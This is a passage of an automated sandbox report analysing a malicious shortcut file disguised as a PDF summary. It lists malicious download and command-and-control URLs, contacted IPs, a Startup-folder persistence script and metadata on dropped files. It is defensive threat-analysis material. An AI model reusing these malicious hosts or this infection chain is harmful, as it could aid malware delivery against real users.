                              https://myfilebuilders.com/sammGmshta.exe, 00000005.00000003.1841460930.000001EB0F00A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1846617746.000001EB0F00A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.1890030259.000001EB0F00C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1885298177.000001EB0F00C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1883848292.000001EB0F00C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1883290702.000001EB0F00A000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://crl.ver)svchost.exe, 00000006.00000002.2897591888.000001B97E600000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://myfilebuilders.com/sammLmshta.exe, 00000005.00000002.1888475276.000001E30CC58000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://myfilebuilders.com/Professional_Socipowershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://myfilebuilders.com/sammRmshta.exe, 00000005.00000003.1840765627.000001EB1396A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840318424.000001EB1395B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840586133.000001EB13968000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1843470326.000001EB13999000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.1891448776.000001EB139B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://myfilebuilders.compowershell.exe, 00000007.00000002.1757475272.000001F40D71C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1757475272.000001F40BCDA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: safe
                                		unknown
                                https://myfilebuilders.com/Ppowershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://myfilebuilders.com/Professional_Social_Media_powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://myfilebuilders.com/samm-0mshta.exe, 00000005.00000002.1888475276.000001E30CC30000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://myfilebuilders.com/sammPpowershell.exe, 00000004.00000002.1653965522.000002A9CB6D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.php.netDtar.exe, 00000015.00000003.2012701021.0000021721947000.00000004.00000020.00020000.00000000.sdmp, tar.exe, 00000015.00000003.2013269823.000002172195E000.00000004.00000020.00020000.00000000.sdmp, tar.exe, 00000015.00000003.2012847011.0000021721956000.00000004.00000020.00020000.00000000.sdmp, php.exe, 00000018.00000000.2016752512.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp, php.exe, 0000001C.00000000.2188550672.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp, php_pdo_mysql.dll.21.dr, php_sysvshm.dll.21.dr, php_mysqli.dll.21.dr, php_zend_test.dll.21.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://myfilebuilders.com/php_bot_downloadpowershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://github.com/Pester/Pesterpowershell.exe, 00000007.00000002.1757475272.000001F40BCDA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://myfilebuilders.com/php_bot_dowpowershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://bugs.php.net/report.phptar.exe, 00000015.00000003.2012701021.0000021721947000.00000004.00000020.00020000.00000000.sdmp, tar.exe, 00000015.00000003.2013269823.000002172195E000.00000004.00000020.00020000.00000000.sdmp, tar.exe, 00000015.00000003.2012847011.0000021721956000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://myfilebuilders.com/php_bot_downloadepowershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://myfilebuilders.com/php_powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE-BOpowershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.php.netphp.exefalse
                                    		high
                                    https://myfilebuilders.com/Professionpowershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://myfilebuilders.com/php_botpowershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://myfilebuilders.com/sammamshta.exe, 00000005.00000002.1888633604.000001E30CCBF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840043057.000001E30CCBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://rodgersluciecassy.com/mbpphp.exe, 0000001C.00000002.2892874564.0000014E5D471000.00000004.00001000.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://myfilebuilders.com/samm;.WSF;.WSH;.MSpowershell.exe, 00000004.00000002.1653812581.000002A9CB6C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://myfilebuilders.cpowershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://myfilebuilders.com/sammjmshta.exe, 00000005.00000003.1841460930.000001EB0F00A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1846617746.000001EB0F00A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.1890030259.000001EB0F00C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1885298177.000001EB0F00C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1883848292.000001EB0F00C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1883290702.000001EB0F00A000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://myfilebuilders.com/sammhpowershell.exe, 00000004.00000002.1654335033.000002A9CDA0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://rodgersluciecassy.com/mbp/apit.php?aid=2&mid=PKJ2RMXRS481H4NV6VCC978Z30rphp.exe, 00000018.00000002.2893070291.000001E12DC57000.00000004.00001000.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://myfilebuilders.com/Professional_Social_Media_Report.pdfpowershell.exe, 00000007.00000002.1757475272.000001F40BCDA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://myfilebuilders.com/Professionalpowershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://myfilebuilders.copowershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://rodgersluciecassy.com/mbp/down/php.exe, 0000001C.00000002.2892874564.0000014E5D471000.00000004.00001000.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://github.com/php/php-src/issuesbeforephp.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmpfalse
                                        		high
                                        https://myfilebuilders.com/ppowershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://myfilebuilders.com/sammppowershell.exe, 00000004.00000002.1654335033.000002A9CD561000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://myfilebuilders.com/sammomshta.exe, 00000005.00000003.1841460930.000001EB0F00A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1846617746.000001EB0F00A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.1890030259.000001EB0F00C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1885298177.000001EB0F00C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1883848292.000001EB0F00C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1883290702.000001EB0F00A000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://myfilebuilders.compowershell.exe, 00000007.00000002.1757475272.000001F40D777000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://myfilebuilders.com/samm$global:?powershell.exefalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://myfilebuilders.com/Professional_Social_Medipowershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://myfilebuilders.com/samm~mshta.exe, 00000005.00000003.1841460930.000001EB0F00A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1846617746.000001EB0F00A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.1890030259.000001EB0F00C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1885298177.000001EB0F00C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1883848292.000001EB0F00C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1883290702.000001EB0F00A000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://myfilebuilders.com/php_bot_downloader_v2-AVERAGEpowershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://myfilebuilders.com/Professipowershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://contoso.com/Licensepowershell.exe, 00000007.00000002.1814428015.000001F41BB25000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://myfilebuilders.com/php_bot_downloader_v2-powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              213.139.205.247
                                              		unknownNetherlands
                                              		136175SERVERHOSH-AS-APServerhoshInternetServiceNLfalse
                                              104.21.2.79
                                              		unknownUnited States
                                              		13335CLOUDFLARENETUSfalse

                                              Private

                                              IP
                                              127.0.0.1

                                              General Information

                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1584384
                                              Start date and time:2025-01-05 10:43:07 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 8m 14s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:30
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:HateSpeech2024_Summary.pdf.lnk.bin.lnk
                                              Detection:MAL
                                              Classification:mal100.troj.expl.evad.winLNK@45/150@0/3
                                              EGA Information:
                                              • Successful, ratio: 40%
                                              HCA Information:Failed
                                              Cookbook Comments:
                                              • Found application associated with file extension: .lnk

                                              Warnings

                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                              • Excluded IPs from analysis (whitelisted): 184.28.90.27, 23.56.252.213, 2.16.168.107, 2.16.168.105, 3.219.243.226, 52.22.41.97, 52.6.155.20, 3.233.129.217, 172.64.41.3, 162.159.61.3, 23.209.209.135, 23.219.161.132, 192.168.2.4, 4.175.87.197, 104.77.220.172, 13.107.246.45
                                              • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, geo2.adobe.com, crl.root-x1.letsencrypt.org.edgekey.net
                                              • Execution Graph export aborted for target mshta.exe, PID 7872 because there are no executed function
                                              • Execution Graph export aborted for target powershell.exe, PID 7788 because it is empty
                                              • Execution Graph export aborted for target powershell.exe, PID 8032 because it is empty
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtCreateFile calls found.
                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              04:43:54API Interceptor1x Sleep call for process: WMIC.exe modified
                                              04:43:57API Interceptor2x Sleep call for process: svchost.exe modified
                                              04:43:59API Interceptor1x Sleep call for process: mshta.exe modified
                                              04:43:59API Interceptor30x Sleep call for process: powershell.exe modified
                                              04:44:16API Interceptor1x Sleep call for process: AcroCEF.exe modified
                                              04:44:45API Interceptor58x Sleep call for process: php.exe modified
                                              09:44:41AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PHP-8.2.vbs

                                              Joe Sandbox View / Context

                                              IPs

                                              No context

                                              Domains

                                              No context

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              SERVERHOSH-AS-APServerhoshInternetServiceNLUundgaaelige.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                              • 209.90.237.48
                                              ORDERDATASHEET#PO8738763.scr.exeGet hashmaliciousAgentTesla, RedLine, SugarDump, XWormBrowse
                                              • 209.90.234.57
                                              Palmebladstag.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                              • 209.90.234.58
                                              01-05-24 remittance.exeGet hashmaliciousGuLoaderBrowse
                                              • 209.90.233.2
                                              87tBuE42ft.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                              • 209.90.234.20
                                              http://213.139.205.131/update_verGet hashmaliciousUnknownBrowse
                                              • 213.139.205.131
                                              http://213.139.205.131/w_ver.datGet hashmaliciousUnknownBrowse
                                              • 213.139.205.131
                                              http://213.139.205.131/update_verGet hashmaliciousUnknownBrowse
                                              • 213.139.205.131
                                              ReleaseEvans#27.docmGet hashmaliciousUnknownBrowse
                                              • 213.139.205.131
                                              Application#89.docmGet hashmaliciousUnknownBrowse
                                              • 213.139.205.131
                                              CLOUDFLARENETUSpaint.exeGet hashmaliciousBlank GrabberBrowse
                                              • 162.159.137.232
                                              K27Yg4V48M.exeGet hashmaliciousLummaCBrowse
                                              • 104.21.56.70
                                              hkMUtKbCqV.exeGet hashmaliciousUnknownBrowse
                                              • 162.159.135.234
                                              IH5XqCdf06.exeGet hashmaliciousLummaCBrowse
                                              • 104.21.56.70
                                              3LcZO15oTC.exeGet hashmaliciousUnknownBrowse
                                              • 104.21.43.44
                                              3jL3mqtjCn.exeGet hashmaliciousLummaCBrowse
                                              • 104.21.48.1
                                              3LcZO15oTC.exeGet hashmaliciousUnknownBrowse
                                              • 172.67.219.93
                                              elyho3x5zz.exeGet hashmaliciousUnknownBrowse
                                              • 188.114.96.3
                                              17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                              • 172.64.41.3
                                              elyho3x5zz.exeGet hashmaliciousUnknownBrowse
                                              • 188.114.96.3

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                              Download File
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1310720
                                              Entropy (8bit):1.3073576467741839
                                              Encrypted:false
                                              SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrT:KooCEYhgYEL0In
                                              MD5:90546F94982D0DB6586D69454A4DACD2
                                              SHA1:B68AD7643C245E51933CA9A31ADE9AE7D8A88623
                                              SHA-256:2C356B408C20CF10FE3C64574D514953DF0DAAD09DABBB289685EF60781B0058
                                              SHA-512:EBBA1B515BB22082F9C443A0DD9FFBC942FFF0B07B1FBCF804706FABFECDAECBD3B2D26DF83102E7D54DDE7CBAB384D49E317BBE835A94EF97E5CEE7ED2F5C28
                                              Malicious:false
                                              Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

                                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                              Download File
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x452bc915, page size 16384, DirtyShutdown, Windows version 10.0
                                              Category:dropped
                                              Size (bytes):1310720
                                              Entropy (8bit):0.42213589454282485
                                              Encrypted:false
                                              SSDEEP:1536:xSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:xaza/vMUM2Uvz7DO
                                              MD5:8F1988D05D55FBA8619E5CA78D0F1A7C
                                              SHA1:C37BFAEFFE93515243609DE952349DA4556A861C
                                              SHA-256:18CD810C6E917C37E0B6DDB9F1DD7F4B872B85318FBD9DEA6919925CB4D121AF
                                              SHA-512:19524C9716D9F96CBAA72B44E5B9B050647EB9A5338E88731156B8999192209E61C8AA5B1B6F5E074F269627C58F91EE30306D00E9D67A4EB2B3509FDA1C0734
                                              Malicious:false
                                              Preview:E+..... .......A.......X\...;...{......................0.!..........{A.9+...}q.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{...................................K89+...}...................~.59+...}...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                              Download File
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):16384
                                              Entropy (8bit):0.0765327378974397
                                              Encrypted:false
                                              SSDEEP:3:IVtllKYer8+ajn13a/M18RYllollcVO/lnlZMxZNQl:IVtllKzr9a53qMayAOewk
                                              MD5:4650E580CC6EC59153A925671D47D7A5
                                              SHA1:0B6A2B8746D31CAD590F1CB5C39CC66C0B778A29
                                              SHA-256:4C8FC6B636AF2D0C6FFEB3A54B7DEE0E5C6A5168403EADEF2F76ADDF689BA973
                                              SHA-512:7A5974A087FAA74B2987D494EE80CDCFDEB3E3C85D0F92F55B5D33B424AD8A69D969EED4FDDF48ADAD5382181AD3F6B465E183B4A1A7BA4393DA33005BF965BB
                                              Malicious:false
                                              Preview:.=.7.....................................;...{..9+...}.......{A..............{A......{A..........{A].................~.59+...}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):289
                                              Entropy (8bit):5.2492844377201155
                                              Encrypted:false
                                              SSDEEP:6:iOH1iL3X9+q2Pwkn2nKuAl9OmbnIFUtt1iL0ZmwD1iLUVkwOwkn2nKuAl9OmbjLJ:7E4vYfHAahFUtl/l5JfHAaSJ
                                              MD5:1217DE6C978816F35D30B8FD33E65271
                                              SHA1:4CC54B1765E2885D7CE85AE2C810129694022C07
                                              SHA-256:EDF9D15B9038BC9A7BDD74448A869557E30C803979E70BEB8D82E5F59E1E7949
                                              SHA-512:350431050E543A1F7A534E1A41A64D9FB868CA2FCEA85BB5EC41ECD8C2E2CDC8B31B408D73A95A1E17F83FE659C35ED5F6BC64534EA76B7DFB0428BBAC5DC87A
                                              Malicious:false
                                              Preview:2025/01/05-04:44:03.393 b78 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/05-04:44:03.396 b78 Recovering log #3.2025/01/05-04:44:03.396 b78 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):289
                                              Entropy (8bit):5.2492844377201155
                                              Encrypted:false
                                              SSDEEP:6:iOH1iL3X9+q2Pwkn2nKuAl9OmbnIFUtt1iL0ZmwD1iLUVkwOwkn2nKuAl9OmbjLJ:7E4vYfHAahFUtl/l5JfHAaSJ
                                              MD5:1217DE6C978816F35D30B8FD33E65271
                                              SHA1:4CC54B1765E2885D7CE85AE2C810129694022C07
                                              SHA-256:EDF9D15B9038BC9A7BDD74448A869557E30C803979E70BEB8D82E5F59E1E7949
                                              SHA-512:350431050E543A1F7A534E1A41A64D9FB868CA2FCEA85BB5EC41ECD8C2E2CDC8B31B408D73A95A1E17F83FE659C35ED5F6BC64534EA76B7DFB0428BBAC5DC87A
                                              Malicious:false
                                              Preview:2025/01/05-04:44:03.393 b78 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/05-04:44:03.396 b78 Recovering log #3.2025/01/05-04:44:03.396 b78 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):336
                                              Entropy (8bit):5.1739326793609965
                                              Encrypted:false
                                              SSDEEP:6:iOH1iLB3+q2Pwkn2nKuAl9Ombzo2jMGIFUtt1iLhGZmwD1iL8s3VkwOwkn2nKuAv:7tvYfHAa8uFUtL/lsF5JfHAa8RJ
                                              MD5:5FC555F8197C5FFD1C7D08549467649B
                                              SHA1:164C4472D4F29A250A789BE5F8CA9930E69FC77E
                                              SHA-256:85313BC0307AA99FC948823182A19F35D9122FA327DAB1E6792C96A75EDA3844
                                              SHA-512:F8FAF737B8EAA5369FF19F993CF5C8DABC2BD9EBC115B9FF1C621139BB0936FFD47ACAAF9CF54323EA2FB8CCEA4D91B343E78BE706C38FB0ABF7151F1D506AF2
                                              Malicious:false
                                              Preview:2025/01/05-04:44:03.499 1d98 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/05-04:44:03.500 1d98 Recovering log #3.2025/01/05-04:44:03.501 1d98 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):336
                                              Entropy (8bit):5.1739326793609965
                                              Encrypted:false
                                              SSDEEP:6:iOH1iLB3+q2Pwkn2nKuAl9Ombzo2jMGIFUtt1iLhGZmwD1iL8s3VkwOwkn2nKuAv:7tvYfHAa8uFUtL/lsF5JfHAa8RJ
                                              MD5:5FC555F8197C5FFD1C7D08549467649B
                                              SHA1:164C4472D4F29A250A789BE5F8CA9930E69FC77E
                                              SHA-256:85313BC0307AA99FC948823182A19F35D9122FA327DAB1E6792C96A75EDA3844
                                              SHA-512:F8FAF737B8EAA5369FF19F993CF5C8DABC2BD9EBC115B9FF1C621139BB0936FFD47ACAAF9CF54323EA2FB8CCEA4D91B343E78BE706C38FB0ABF7151F1D506AF2
                                              Malicious:false
                                              Preview:2025/01/05-04:44:03.499 1d98 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/05-04:44:03.500 1d98 Recovering log #3.2025/01/05-04:44:03.501 1d98 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):475
                                              Entropy (8bit):4.9707925746743955
                                              Encrypted:false
                                              SSDEEP:12:YH/um3RA8sqxVksBdOg2Hnfcaq3QYiubInP7E4T3y:Y2sRdsK/dMHu3QYhbG7nby
                                              MD5:9A5E5E5DB5269B629C54B0D88ED4F9A7
                                              SHA1:3F8D3E8F28B23A6B35794C01CDCCFA30665C3992
                                              SHA-256:9C9FDF850473DB83CF846F16B6D889ABECB6612B5CAF047FD982A650D41591FC
                                              SHA-512:B2293EBD3B554697667E9F2D9722C7BA93CB7D71AEE0B6459B6EAF6BC01F65DCCDD07DDA0DE2934FAAB45370455897911B60AAC12505A2335AE74D3AA50A1063
                                              Malicious:false
                                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380630255579843","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":122642},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\e2712fd8-06e2-4164-857d-757ce7246b5f.tmp

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              File Type:JSON data
                                              Category:modified
                                              Size (bytes):475
                                              Entropy (8bit):4.9707925746743955
                                              Encrypted:false
                                              SSDEEP:12:YH/um3RA8sqxVksBdOg2Hnfcaq3QYiubInP7E4T3y:Y2sRdsK/dMHu3QYhbG7nby
                                              MD5:9A5E5E5DB5269B629C54B0D88ED4F9A7
